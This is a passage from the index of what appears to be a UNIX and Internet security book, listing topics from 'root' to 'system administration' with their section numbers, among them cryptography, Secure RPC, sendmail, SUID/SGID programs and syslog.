immutable files and : 9.1.1. Immutable and Append-Only Files<br />

network services with : 17.4. <strong>Sec</strong>urity Implications of Network Services<br />

protecting<br />

8.5. Protecting the root Account<br />

8.5.3.2. Trusted computing base<br />

on remote machine, fingering : 24.2.4.2. How to contact the system administrator of a computer you don't know<br />

single-command accounts and : 8.1.3. Accounts That Run a Single Command<br />

web server as : 18.2.1. The Server's UID<br />

root directory : 5.1.1. Directories<br />

backups of : 7.1.3. Types of Backups<br />

UUCP access from : 15.4.2.1. Some bad examples<br />

root option for /etc/exports : 20.2.1.1. /etc/exports<br />

ROT13 algorithm<br />

6.4.1. Summary of Private Key Systems<br />

6.4.3. ROT13: Great for Encoding Offensive Jokes<br />

rotating backup media<br />

7.1.3. Types of Backups<br />

7.2.1.2. Media rotation<br />

routed daemon : 17.3.19. Routing <strong>Internet</strong> Protocol (RIP routed) (UDP Port 520)<br />

routers, intelligent : 21.2.3. Setting Up the Choke<br />

routing : 16.2.2. Routing<br />

Routing <strong>Internet</strong> Protocol : (see RIP)<br />

RPC table (NIS+) : 19.5.3. NIS+ Tables<br />

rpc.rexd server : 17.3.22. RPC rpc.rexd (TCP Port 512)<br />

rpcbind : (see portmapper program)<br />

RPCs (remote procedure calls)<br />

17.3.22. RPC rpc.rexd (TCP Port 512)<br />

19. RPC, NIS, NIS+, and Kerberos<br />

19.7.2. SESAME<br />

authentication of<br />

19.2.2. RPC Authentication<br />

19.2.2.4. AUTH_KERB<br />

portmapper program : 17.3.11. Sun RPC's portmapper (UDP and TCP Ports 111)<br />

<strong>Sec</strong>ure : (see <strong>Sec</strong>ure RPC)<br />

spoofing : 19.4.4.4. Spoofing RPC<br />

RS-232 serial protocol : 14.3. The RS-232 Serial Protocol<br />

RSA algorithm<br />

6.4.2. Summary of Public Key Systems<br />

6.4.6. RSA and Public Key Cryptography<br />

6.4.6.3. Strength of RSA<br />

6.5.3. Digital Signatures<br />

rsh (restricted shell)<br />

8.1.4.1. Restricted shells under System V <strong>UNIX</strong><br />

8.1.4.6. Potential problems with rsh<br />

17.3.18. rlogin and rsh (TCP Ports 513 and 514)<br />

17.3.18.6. /etc/hosts.lpd file<br />

rsh command : 16.3.2. <strong>Sec</strong>urity and Nameservice<br />

rshd program : 11.1.2. Back Doors and Trap Doors<br />

RUID : (see real UIDs/GIDs)<br />

runacct command : 10.2. The acct/pacct Process Accounting File<br />

ruusend command : 15.4.3. L.cmds: Providing Remote Command Execution<br />

rw option for /etc/exports : 20.2.1.1. /etc/exports<br />

Index: S<br />

S/Key codebook scheme : 8.7.3. Code Books<br />

sa command : 10.2. The acct/pacct Process Accounting File<br />

sabotage : (see terrorism; vandalism)<br />

salt<br />

8.6.2. What Is Salt?<br />

8.6.3. What the Salt Doesn't Do<br />

sanitizing media : 12.3.2.3. Sanitize your media before disposal<br />

SATAN package<br />

17.6.1. SATAN<br />

E.4.7. SATAN<br />

savacct file : 10.2. The acct/pacct Process Accounting File<br />

saved UID : 4.3.2. Saved IDs<br />

saving backup media<br />

7.1.5. How Long Should You Keep a Backup?<br />

(see also archiving information; backups)<br />

sbrk command : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

scanf function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

scanning networks : 17.6. Network Scanning<br />

SCCS (Source Code Control System)<br />

7.3.2. Building an Automatic Backup System<br />

17.3. Primary <strong>UNIX</strong> Network Services<br />

Scherbius, Arthur : 6.3. The Enigma Encryption System<br />

screen savers : 12.3.5.2. X screen savers<br />

screens, multiple : 12.3.4.3. Multiple screens<br />

script command : 24.1.2. Rule #2: DOCUMENT<br />

scripts, CGI : (see CGI, scripts)<br />

scytales : 6.1. A Brief History of Cryptography<br />

search warrants<br />

26.2.4. Hazards of Criminal Prosecution<br />

26.2.5. If You or One of Your Employees Is a Target of an Investigation...<br />

searching for .rhosts file : 17.3.18.5. Searching for .rhosts files<br />

Seberry, Jennifer : 6.5.4.3. HAVAL<br />

secrecy, Kerberos : 19.6.1.3. Authentication, data integrity, and secrecy<br />

secret keys : 6.4.6. RSA and Public Key Cryptography<br />

<strong>Sec</strong>ret Service, U.S.<br />

26.2.2. Federal Jurisdiction<br />

F.3.3. U.S. <strong>Sec</strong>ret Service (USSS)<br />

<strong>Sec</strong>ure Hash Algorithm (SHA)<br />

6.5.3. Digital Signatures<br />

6.5.4.2. SHA<br />

<strong>Sec</strong>ure HTTP : 18.4.1. Eavesdropping Over the Wire<br />

<strong>Sec</strong>ure NFS : 19.3.2.4. Using <strong>Sec</strong>ure NFS<br />

-secure option<br />

19.3.2.4. Using <strong>Sec</strong>ure NFS<br />

19.4.4.5. Spoofing NIS<br />

secure option for /etc/exports : 20.2.1.1. /etc/exports<br />

<strong>Sec</strong>ure RPC<br />

19.3. <strong>Sec</strong>ure RPC (AUTH_DES)<br />

19.3.4. Limitations of <strong>Sec</strong>ure RPC<br />

with NIS/NIS+<br />

19.3.2. Setting Up <strong>Sec</strong>ure RPC with NIS<br />

19.3.4. Limitations of <strong>Sec</strong>ure RPC<br />

NTP and : 19.3.1.3. Setting the window<br />

reauthentication : 19.3.1.3. Setting the window<br />

versus Kerberos : 19.6.2. Kerberos vs. <strong>Sec</strong>ure RPC<br />

<strong>Sec</strong>ure Socket Layer : (see SSL)<br />

secure terminals : 8.5.1. <strong>Sec</strong>ure Terminals<br />

<strong>Sec</strong>ureID : 8.7.2. Token Cards<br />

<strong>Sec</strong>ureNet key : 8.7.2. Token Cards<br />

security<br />

2.1. Planning Your <strong>Sec</strong>urity Needs<br />

9.1.2. Read-only Filesystems<br />

12.1.1. The Physical <strong>Sec</strong>urity Plan<br />

(see also integrity; physical security; system administration; threats)<br />

of CGI scripts<br />

18.2.3. Writing <strong>Sec</strong>ure CGI Scripts and Programs<br />

18.2.4.1. Beware mixing HTTP with anonymous FTP<br />

change detection<br />

9.2. Detecting Change<br />

9.3. A Final Note<br />

checking arguments : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

critical messages to log<br />

10.5.3. syslog Messages<br />

10.5.3.1. Beware false log entries<br />

cryptography<br />

6. Cryptography<br />

6.7.2. Cryptography and Export Controls<br />

definition of : 1.1. What Is Computer <strong>Sec</strong>urity?<br />

digital signatures : (see digital signatures)<br />

disabling finger : 17.3.8.2. Disabling finger<br />

disk quotas : 25.2.2.5. Using quotas<br />

dormant accounts, finding : 8.4.3. Finding Dormant Accounts<br />

drills : 24.1.3. Rule #3: PLAN AHEAD<br />

/etc/passwd : (see /etc/group file; /etc/passwd file)<br />

firewalls : (see firewalls)<br />

four steps toward : 2.4.4.7. Defend in depth<br />

guessable passwords<br />

3.6.1. Bad Passwords: Open Doors<br />

3.6.4. Passwords on Multiple Machines<br />

identification protocol : 17.3.12. Identification Protocol (auth) (TCP Port 113)<br />

improving DES algorithm<br />

6.4.5. Improving the <strong>Sec</strong>urity of DES<br />

6.4.5.2. Triple DES<br />

IP<br />

16.3. IP <strong>Sec</strong>urity<br />

16.3.3. Authentication<br />

laws and : (see laws)<br />

legal liability<br />

26.4. Other Liability<br />

26.4.7. Harassment, Threatening Communication, and Defamation<br />

levels of NIS+ servers : 19.5.5. NIS+ Limitations<br />

link-level : 16.3.1. Link-level <strong>Sec</strong>urity<br />

message digests : (see message digests)<br />

modems and<br />

14.4. Modems and <strong>Sec</strong>urity<br />

14.4.4.2. Protection against eavesdropping<br />

monitoring : (see logging)<br />

multilevel (defense in depth)<br />

1.3. History of <strong>UNIX</strong><br />

2.4.4.7. Defend in depth<br />

2.5.3. Final Words: Risk Management Means Common Sense<br />

17.2. Controlling Access to Servers<br />

name service and : 16.3.2. <strong>Sec</strong>urity and Nameservice<br />

national : 26.2.2. Federal Jurisdiction<br />

network services<br />

17.4. <strong>Sec</strong>urity Implications of Network Services<br />

19.1. <strong>Sec</strong>uring Network Services<br />

passwords<br />

3.2. Passwords<br />

3.8. Summary<br />

personnel<br />

13. Personnel <strong>Sec</strong>urity<br />

13.3. Outsiders<br />

A.1.1.12. Chapter 13: Personnel <strong>Sec</strong>urity<br />

policy of<br />

1.2. What Is an Operating System?<br />

2. Policies and Guidelines<br />

2.5.3. Final Words: Risk Management Means Common Sense<br />

protecting backups<br />

7.1.6. <strong>Sec</strong>urity for Backups<br />

7.1.6.3. Data security for backups<br />

published resources on<br />

D. Paper Sources<br />

D.2. <strong>Sec</strong>urity Periodicals<br />

responding to breakins<br />

24. Discovering a Break-in<br />

24.7. Damage Control<br />

restricting login : 8.3. Restricting Logins<br />

.rhosts : (see .rhosts file)<br />

sendmail problems : 17.3.4.1. sendmail and security<br />

Skipjack algorithm : 6.4.1. Summary of Private Key Systems<br />

SNMP and : 17.3.15. Simple Network Management Protocol (SNMP) (UDP Ports 161 and 162)<br />

software piracy : 26.4.2.1. Software piracy and the SPA<br />

standards of : 2.4.2. Standards<br />

superuser problems : 4.2.1.5. The problem with the superuser<br />

through obscurity<br />

2.5. The Problem with <strong>Sec</strong>urity Through Obscurity<br />

2.5.3. Final Words: Risk Management Means Common Sense<br />

8.8.9. Account Names Revisited: Using Aliases for Increased <strong>Sec</strong>urity<br />

18.2.4. Keep Your Scripts <strong>Sec</strong>ret!<br />

tools for : 11.1. Programmed Threats: Definitions<br />

Tripwire package<br />

9.2.4. Tripwire<br />

9.2.4.2. Running Tripwire<br />

<strong>UNIX</strong> and<br />

1. Introduction<br />

1.4. <strong>Sec</strong>urity and <strong>UNIX</strong><br />

1.4.3. Add-On Functionality Breeds Problems<br />

user awareness of<br />

1.4.1. Expectations<br />

2. Policies and Guidelines<br />

2.4.4.4. Concentrate on education<br />

13.2.2. Ongoing Training and Awareness<br />

UUCP : (see UUCP)<br />

weakness-finding tools : 11.1.1. <strong>Sec</strong>urity Tools<br />

World Wide Web<br />

18. WWW <strong>Sec</strong>urity<br />

18.7. Summary<br />

X Window System<br />

17.3.21.2. X security<br />

17.3.21.3. The xhost facility<br />

<strong>Sec</strong>urity Emergency Response Team (SERT) : F.3.4.4. Australia: <strong>Internet</strong> .au domain<br />

security file (UUCP) : 10.3.4. uucp Log Files<br />

security holes<br />

2.5. The Problem with <strong>Sec</strong>urity Through Obscurity<br />

(see also back doors; threats)<br />

ftpd program : 6.5.2. Using Message Digests<br />

mailing list for : E.1.3.3. Bugtraq<br />

reporting : 2.5.1. Going Public<br />

ruusend in L.cmds file : 15.4.3. L.cmds: Providing Remote Command Execution<br />

SUID/SGID programs : 5.5.3.1. write: Example of a possible SUID/SGID security hole<br />

/usr/lib/preserve : 5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

UUCP : 15.7. Early <strong>Sec</strong>urity Problems with UUCP<br />

sed scripts : 11.1.4. Trojan Horses<br />

seeds, random number<br />

23.6. Tips on Generating Random Numbers<br />

23.8. Picking a Random Seed<br />

select system call : 17.1.3. The /etc/inetd Program<br />

selection lists : 18.2.3.1. Do not trust the user's browser!<br />

self-destruct sequences : 27.2.1. Hardware Bugs<br />

SENDFILES= command<br />

15.5.1.3. A Sample Permissions file<br />

15.5.2. Permissions Commands<br />

sendmail<br />

11.1.2. Back Doors and Trap Doors<br />

11.5.2.5. .forward, .procmailrc<br />

11.5.3.3. /usr/lib/aliases, /etc/aliases, /etc/sendmail/aliases, aliases.dir, or aliases.pag<br />

17.3.4. Simple Mail Transfer Protocol (SMTP) (TCP Port 25)<br />

17.3.4.3. Improving the security of Berkeley sendmail V8<br />

24.2.4.2. How to contact the system administrator of a computer you don't know<br />

(see also mail)<br />

aliases : 11.5.3.3. /usr/lib/aliases, /etc/aliases, /etc/sendmail/aliases, aliases.dir, or aliases.pag<br />

determining version of : 17.3.4.1. sendmail and security<br />

.forward file : 24.4.1.6. Changes to startup files<br />

improving Version 8 : 17.3.4.3. Improving the security of Berkeley sendmail V8<br />

logging to syslog : 17.3.4.3. Improving the security of Berkeley sendmail V8<br />

same <strong>Internet</strong>/NIS domain : 19.4.3. NIS Domains<br />

security problems with : 17.3.4.1. sendmail and security<br />

sendmail.cf file : 17.3.4. Simple Mail Transfer Protocol (SMTP) (TCP Port 25)<br />

sensors : (see detectors)<br />

separation of duties : 13.2.5. Least Privilege and Separation of Duties<br />

sequence of commands : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

serial interfaces : 14.2. Serial Interfaces<br />

Serial Line <strong>Internet</strong> Protocol (SLIP) : 14.5. Modems and <strong>UNIX</strong><br />

serial numbers, logging : 10.7.1.2. Informational material<br />

SERT (<strong>Sec</strong>urity Emergency Response Team) : F.3.4.4. Australia: <strong>Internet</strong> .au domain<br />

server-side includes<br />

18.2.2.2. Additional configuration issues<br />

18.3.2. Commands Within the Block<br />

servers<br />

16.2.5. Clients and Servers<br />

17.1. Understanding <strong>UNIX</strong> <strong>Internet</strong> Servers<br />

17.1.3. The /etc/inetd Program<br />

backing up : 7.2.2. Small Network of Workstations and a Server<br />

checklist for bringing up : 17.4. <strong>Sec</strong>urity Implications of Network Services<br />

controlling access to : 17.2. Controlling Access to Servers<br />

ftp : (see FTP)<br />

http : (see http server)<br />

load shedding : 23.3. Tips on Writing Network Programs<br />

master/slave : (see NIS)<br />

NIS+, security levels of : 19.5.5. NIS+ Limitations<br />

overloading with requests : 25.3.1. Service Overloading<br />

setting up for FTP<br />

17.3.2.4. Setting up an FTP server<br />

17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

web : (see web servers)<br />

WN : 18.3. Controlling Access to Files on Your Server<br />

Xauthority : 17.3.21.4. Using Xauthority magic cookies<br />

service overloading : 25.3.1. Service Overloading<br />

services file : 17.1.1. The /etc/services File<br />

Services table (NIS+) : 19.5.3. NIS+ Tables<br />

SESAME (<strong>Sec</strong>ure European System for Applications in a Multivendor Environment) : 19.7.2. SESAME<br />

session<br />

hijacking : 17.3.3. TELNET (TCP Port 23)<br />

IDs<br />

4.3.3. Other IDs<br />

C.1.3.4. Process groups and sessions<br />

keys<br />

6.4. Common Cryptographic Algorithms<br />

19.3.1.1. Proving your identity<br />

setgid function<br />

4.3.3. Other IDs<br />

23.4. Tips on Writing SUID/SGID Programs<br />

setpgrp function : C.1.3.4. Process groups and sessions<br />

setrlimit function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

setsid function : C.1.3.4. Process groups and sessions<br />

setuid file : 4.3.1. Real and Effective UIDs<br />

setuid function : 23.4. Tips on Writing SUID/SGID Programs<br />

setuid/setgid : (see SUID/SGID programs)<br />

SGID bit<br />

5.5.1. SUID, SGID, and Sticky Bits<br />

5.5.7. SGID Bit on Files (System V <strong>UNIX</strong> Only): Mandatory Record Locking<br />

(see also SUID/SGID programs)<br />

clearing with chown : 5.7. chown: Changing a File's Owner<br />

on directories : 5.5.6. SGID and Sticky Bits on Directories<br />

on files : 5.5.7. SGID Bit on Files (System V <strong>UNIX</strong> Only): Mandatory Record Locking<br />

SGID files : B.3.2.2. SGID files<br />

sh (Bourne shell)<br />

11.5.1. Shell Features<br />

C.5.3. Running the User's Shell<br />

(see also shells)<br />

sh program : 5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

SUID and : 5.5.2. Problems with SUID<br />

SHA (<strong>Sec</strong>ure Hash Algorithm)<br />

6.5.3. Digital Signatures<br />

6.5.4.2. SHA<br />

shadow file<br />

8.1.1. Accounts Without Passwords<br />

8.8.5. Shadow Password Files<br />

shadow passwords<br />

3.2.1. The /etc/passwd File<br />

8.4.1. Changing an Account's Password<br />

8.8.5. Shadow Password Files<br />

Shamir, Adi<br />

6.4.2. Summary of Public Key Systems<br />

6.4.6. RSA and Public Key Cryptography<br />

shar format file : 11.1.4. Trojan Horses<br />

shareware : 27.2.2. Viruses on the Distribution Disk<br />

shell escapes<br />

8.1.3. Accounts That Run a Single Command<br />

8.1.4.6. Potential problems with rsh<br />

in L.cmds list : 15.4.3. L.cmds: Providing Remote Command Execution<br />

shell scripts, SUID<br />

5.5.3. SUID Shell Scripts<br />

5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

shells<br />

1.2. What Is an Operating System?<br />

3.2.1. The /etc/passwd File<br />

11.1.4. Trojan Horses<br />

11.5.1. Shell Features<br />

11.5.1.4. Filename attacks<br />

C.2. Creating Processes<br />

C.5.3. Running the User's Shell<br />

changing<br />

8.4.2. Changing the Account's Login Shell<br />

8.7.1. Integrating One-time Passwords with <strong>UNIX</strong><br />

history files : 10.4.1. Shell History<br />

one-command accounts : 8.1.3. Accounts That Run a Single Command<br />

restricted (rsh, ksh)<br />

8.1.4.1. Restricted shells under System V <strong>UNIX</strong><br />

8.1.4.6. Potential problems with rsh<br />

UUCP : (see uucico program)<br />

shells file : 8.4.2. Changing the Account's Login Shell<br />

Shimomura, Tsutomu : 23.3. Tips on Writing Network Programs<br />

shoulder surfing<br />

3.2.4. Passwords Are a Shared <strong>Sec</strong>ret<br />

5.5.2. Problems with SUID<br />

shredders : 12.3.3. Other Media<br />

SHTTP : (see <strong>Sec</strong>ure HTTP)<br />

shutdowns and wtmp file : 10.1.3. last Program<br />

SIGHUP signal : C.4. The kill Command<br />

SIGKILL signal : C.4. The kill Command<br />

Signal Ground (SG) : 14.3. The RS-232 Serial Protocol<br />

signal grounding : 25.3.3. Signal Grounding<br />

signals : C.3. Signals<br />

signature : 9.2. Detecting Change<br />

signatures : (see digital signatures)<br />

SIGSTOP signal : C.4. The kill Command<br />

SIGTERM signal : 25.2.1.1. Too many processes<br />

Simple Mail Transfer Protocol (SMTP)<br />

17.3.4. Simple Mail Transfer Protocol (SMTP) (TCP Port 25)<br />

17.3.4.3. Improving the security of Berkeley sendmail V8<br />

Simple Network Management Protocol : (see SNMP)<br />

single-user mode : C.5.1. Process #1: /etc/init<br />

Skipjack algorithm : 6.4.1. Summary of Private Key Systems<br />

slash (/)<br />

IFS separator : 11.5.1.2. IFS attacks<br />

root directory<br />

5.1.1. Directories<br />

(see also root directory)<br />

Slave mode (uucico) : 15.1.4. How the UUCP Commands Work<br />

slave server<br />

19.4. Sun's Network Information Service (NIS)<br />

(see also NIS)<br />

SLIP (Serial Line <strong>Internet</strong> Protocol)<br />

14.5. Modems and <strong>UNIX</strong><br />

16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

Small Business Community Nationwide (SBA CERT) : F.3.4.31. Small Business Association (SBA): small business community nationwide<br />

smap program : 17.3.4.1. sendmail and security<br />

smart cards, firewalls : 21.5. Special Considerations<br />

smit tool : 8.8.2. Constraining Passwords<br />

smoke and smoking : 12.2.1.2. Smoke<br />

SMTP (Simple Mail Transfer Protocol)<br />

17.3.4. Simple Mail Transfer Protocol (SMTP) (TCP Port 25)<br />

17.3.4.3. Improving the security of Berkeley sendmail V8<br />

SNA (System Network Architecture) : 16.4.2. SNA<br />

SNEFRU algorithm : 6.5.4.4. SNEFRU<br />

sniffers<br />

1.4.3. Add-On Functionality Breeds Problems<br />

3. Users and Passwords<br />

8.7. One-Time Passwords<br />

17.3.3. TELNET (TCP Port 23)<br />

(see also eavesdropping)<br />

network : 16.3. IP <strong>Sec</strong>urity<br />

packet : 16.3.1. Link-level <strong>Sec</strong>urity<br />

SNMP (Simple Network Management Protocol) : 17.3.15. Simple Network Management Protocol (SNMP) (UDP Ports 161 and 162)<br />

snoop program : 24.2.3. Monitoring the Intruder<br />

SOCKS : E.4.8. SOCKS<br />

soft disk quotas : 25.2.2.5. Using quotas<br />

software<br />

for backups<br />

7.4. Software for Backups<br />

7.4.7. inode Modification Times<br />

bugs in : (see bugs)<br />

for checking integrity : 19.5.5. NIS+ Limitations<br />

checking new<br />

8.1.5.2. Checking new software<br />

11.1.2. Back Doors and Trap Doors<br />

consistency of : 2.1. Planning Your <strong>Sec</strong>urity Needs<br />

distributing : (see FTP)<br />

exporting : 26.4.1. Munitions Export<br />

failure of : 7.1.1.1. A taxonomy of computer failures<br />

hacker challenges : 27.2.4. Hacker Challenges<br />

logic bombs : 11.1.3. Logic Bombs<br />

operating system : (see operating systems)<br />

patches for, logging : 10.7.2.2. Informational material<br />

quality of<br />

1.4.2. Software Quality<br />

1.4.3. Add-On Functionality Breeds Problems<br />

stolen (pirated)<br />

17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

26.4.2.1. Software piracy and the SPA<br />

stored via FTP : 17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

testing : 1.4.2. Software Quality<br />

vendor license agreements : 18.5.2. Trusting Your Software Vendor<br />

viruses : 11.1.5. Viruses<br />

worms : 11.1.6. Worms<br />

software patents : 6.7.1. Cryptography and the U.S. Patent System<br />

Software Publishers Association (SPA) : 26.4.2.1. Software piracy and the SPA<br />

Software <strong>Sec</strong>urity Response Team (SSRT) : F.3.4.9. Digital Equipment Corporation and customers<br />

Solaris<br />

1.3. History of <strong>UNIX</strong><br />

8.7.1. Integrating One-time Passwords with <strong>UNIX</strong><br />

/etc/logindevperm : 17.3.21.1. /etc/fbtab and /etc/logindevperm<br />

process limit : 25.2.1.1. Too many processes<br />

<strong>Sec</strong>ure RPC time window : 19.3.1.3. Setting the window<br />

/var/adm/loginlog file : 10.1.4. loginlog File<br />

wtmpx file : 10.1.2. utmp and wtmp Files<br />

Source Code Control System (SCCS) : 7.3.2. Building an Automatic Backup System<br />

source code, keeping secret : 2.5. The Problem with <strong>Sec</strong>urity Through Obscurity<br />

SPA (Software Publishers Association) : 26.4.2.1. Software piracy and the SPA<br />

Spaf's first principle : 2.4.4.5. Have authority commensurate with responsibility<br />

spies<br />

11.3. Authors<br />

14.4.4.1. Kinds of eavesdropping<br />

spoofing : 16.3. IP <strong>Sec</strong>urity<br />

network connection : 8.5.3.1. Trusted path<br />

network services : 17.5. Monitoring Your Network with netstat<br />

NIS : 19.4.4.5. Spoofing NIS<br />

RPCs : 19.4.4.4. Spoofing RPC<br />

spool file : 15.1.4. How the UUCP Commands Work<br />

spoolers, printer : 12.3.4.1. Printer buffers<br />

sprinkler systems<br />

12.2.1.1. Fire<br />

(see also water)<br />

Sprint response team : F.3.4.32. Sprint<br />

sprintf function<br />

23.1.1. The Lesson of the <strong>Internet</strong> Worm<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

sscanf function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

SSL (<strong>Sec</strong>ure Socket Layer) : 18.4.1. Eavesdropping Over the Wire<br />

SSRT (Software <strong>Sec</strong>urity Response Team) : F.3.4.9. Digital Equipment Corporation and customers<br />

Stallman, Richard : 1. Introduction<br />

start bit<br />

14.1. Modems: Theory of Operation<br />

14.2. Serial Interfaces<br />

startup command : 10.2.1. Accounting with System V<br />

startup files<br />

attacks via<br />

11.5.2. Start-up File Attacks<br />

11.5.2.7. Other initializations<br />

intruder's changes to : 24.4.1.6. Changes to startup files<br />

stat function : 5.4. Using Directory Permissions<br />

state law enforcement : 26.2.1. The Local Option<br />

stateless : 20.1.4.3. Connectionless and stateless<br />

static electricity : 12.2.1.8. Electrical noise<br />

static links : 23.4. Tips on Writing SUID/SGID Programs<br />

stdio : (see portable I/O library)<br />

Steele, Guy L. : 1. Introduction<br />

sticky bits : 5.5.1. SUID, SGID, and Sticky Bits<br />

on directories : 5.5.6. SGID and Sticky Bits on Directories<br />

stolen property : (see theft)<br />

stop bit<br />

14.1. Modems: Theory of Operation<br />

14.2. Serial Interfaces<br />

storage<br />

12.3.4. Protecting Local Storage<br />

12.3.4.5. Function keys<br />

strcpy routine : 23.1.1. The Lesson of the <strong>Internet</strong> Worm<br />

streadd function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

strecpy function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

strength, cryptographic : 6.2.3. Cryptographic Strength<br />

of DES algorithm<br />

6.4.4.3. DES strength<br />

6.4.5.2. Triple DES<br />

of RSA algorithm : 6.4.6.3. Strength of RSA<br />

strings command : 12.3.5.2. X screen savers<br />

strtrns function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

su command<br />

4.2.1.2. Superuser is not for casual use<br />

4.3. su: Changing Who You Claim to Be<br />

4.3.8. Other Uses of su<br />

becoming superuser : 4.3.4. Becoming the Superuser<br />

log of failed attempts : 4.3.7. The Bad su Log<br />

sulog file<br />

10.1. The Basic Log Files<br />

10.3.2. sulog Log File<br />

utmp and wtmp files and : 10.1.2.1. su command and /etc/utmp and /var/adm/wtmp files<br />

subnetting : 16.2.1.2. Classical network addresses<br />

substitution (in encryption) : 6.1.2. Cryptography and Digital Computers<br />

SUID/SGID programs<br />

4.3.1. Real and Effective UIDs<br />

5.5. SUID<br />

5.5.7. SGID Bit on Files (System V <strong>UNIX</strong> Only): Mandatory Record Locking<br />

B.3. SUID and SGID Files<br />

back door via : 11.1.2. Back Doors and Trap Doors<br />

chown command and : 5.7. chown: Changing a File's Owner<br />

chroot call and : 8.1.5.2. Checking new software<br />

created by intruders : 24.4.1.3. New SUID and SGID files<br />

on directories : 5.5.6. SGID and Sticky Bits on Directories<br />

disabling (turning off) : 5.5.5. Turning Off SUID and SGID in Mounted Filesystems<br />

finding all files<br />

5.5.4. Finding All of the SUID and SGID Files<br />

5.5.4.1. The ncheck command<br />

shell scripts<br />

5.5.3. SUID Shell Scripts<br />

5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

uucp access : 15.3. UUCP and <strong>Sec</strong>urity<br />

writing<br />

23. Writing <strong>Sec</strong>ure SUID and Network Programs<br />

23.4. Tips on Writing SUID/SGID Programs<br />

suing : (see civil actions)<br />

sulog file<br />

4.3.7. The Bad su Log<br />

10.3.2. sulog Log File<br />

sum command<br />

6.5.5.1. Checksums<br />

9.2.3. Checksums and Signatures<br />

Sun Microsystems' NIS : (see NIS)<br />

Sun Microsystems : F.3.4.34. Sun Microsystems customers<br />

SUN-DES-1 authentication : 17.3.21.3. The xhost facility<br />

SunOS operating system : 1.3. History of <strong>UNIX</strong><br />

authdes_win variable : 19.3.1.3. Setting the window<br />

/etc/fbtab file : 17.3.21.1. /etc/fbtab and /etc/logindevperm<br />

TFTP and : 17.3.7. Trivial File Transfer Protocol (TFTP) (UDP Port 69)<br />

trusted hosts and : 17.3.18.5. Searching for .rhosts files<br />

superencryption : 6.4.5. Improving the <strong>Sec</strong>urity of DES<br />

superuser<br />

4. Users, Groups, and the Superuser<br />

4.2.1. The Superuser<br />

4.2.1.5. The problem with the superuser<br />

(see also root account)<br />

abilities of : 27.1.3. What the Superuser Can and Cannot Do<br />

becoming with su : 4.3.4. Becoming the Superuser<br />

changing passwords<br />

8.4.1. Changing an Account's Password<br />

8.8.8. Disabling an Account by Changing Its Password<br />

encryption and : 6.2.4. Why Use Encryption with <strong>UNIX</strong>?<br />

logging attempts to become : (see sulog file)<br />

problems with : 4.2.1.5. The problem with the superuser<br />

restrictions on : 4.2.1.4. What the superuser can't do<br />

TCB files : 8.5.3.2. Trusted computing base<br />

using passwd command : 3.5. Verifying Your New Password<br />

web server as : 18.2.1. The Server's UID<br />

SURFnet : F.3.4.25. Netherlands: SURFnet-connected sites<br />

surges : (see power surges)<br />

SVR4 (System V Release 4) : 1.3. History of <strong>UNIX</strong><br />

swap partition : 5.5.1. SUID, SGID, and Sticky Bits<br />

swap space : 25.2.3. Swap Space Problems<br />

Swatch program<br />

10.6. Swatch: A Log File Tool<br />

10.6.2. The Swatch Configuration File<br />

E.4.9. Swatch<br />

SWITCH : F.3.4.35. SWITCH-connected sites<br />

symbolic links and permissions : 5.1.7. File Permissions in Detail<br />

symbolic-link following<br />

18.2.2.2. Additional configuration issues<br />

18.3.2. Commands Within the Block<br />

SymLinksIfOwnerMatch option : 18.3.2. Commands Within the Block<br />

symmetric key : (see private-key cryptography)<br />

SYN bit : 16.2.4.2. TCP<br />

sync system call<br />

5.6. Device Files<br />

8.1.3. Accounts That Run a Single Command<br />

sys (user) : 4.1. Users and Groups<br />

syslog facility<br />

4.3.7. The Bad su Log<br />

10.5. The <strong>UNIX</strong> System Log (syslog) Facility<br />

10.5.3.1. Beware false log entries<br />

23.1.1. The Lesson of the <strong>Internet</strong> Worm<br />

false log entries : 10.5.3.1. Beware false log entries<br />

where to log<br />

10.5.2. Where to Log<br />

10.5.2.3. Logging everything everywhere<br />

syslog file : 17.3.4.3. Improving the security of Berkeley sendmail V8<br />

syslog.conf file : 10.5.1. The syslog.conf Configuration File<br />

systat service : 17.3.1. systat (TCP Port 11)<br />

system<br />

auditing activity on : 2.1. Planning Your <strong>Sec</strong>urity Needs<br />

backing up critical files<br />

7.3. Backing Up System Files<br />

7.3.2. Building an Automatic Backup System<br />

control over : (see access control)<br />

database files : 1.2. What Is an Operating System?<br />

overload attacks : 25.2.1.2. System overload attacks<br />

performance : (see performance)<br />

remote, commands on : 15.1.2. uux Command<br />

summarizing usage per user : 25.2.2.2. quot command<br />

transferring files to other : 15.1.1. uucp Command<br />

system (in Swatch program) : 10.6.2. The Swatch Configuration File<br />

system administration : 2.4.4.5. Have authority commensurate with responsibility<br />

avoiding conventional passwords<br />

8.8. Administrative Techniques for Conventional Passwords<br />

8.8.9. Account Names Revisited: Using Aliases for Increased <strong>Sec</strong>urity<br />

change monitoring : 9.3. A Final Note<br />

changing passwords<br />

8.4.1. Changing an Account's Password<br />

8.8.8. Disabling an Account by Changing Its Password<br />

cleaning up /tmp directory : 25.2.4. /tmp Problems<br />

contacting administrator : 24.2.4.2. How to contact the system administrator of a computer you don't know<br />

controlling UUCP security : 15.3. UUCP and <strong>Sec</strong>urity<br />

detached signatures (PGP) : 6.6.3.6. PGP detached signatures<br />

disabling finger system : 17.3.8.2. Disabling finger<br />

discovering intruders<br />

24.2. Discovering an Intruder<br />

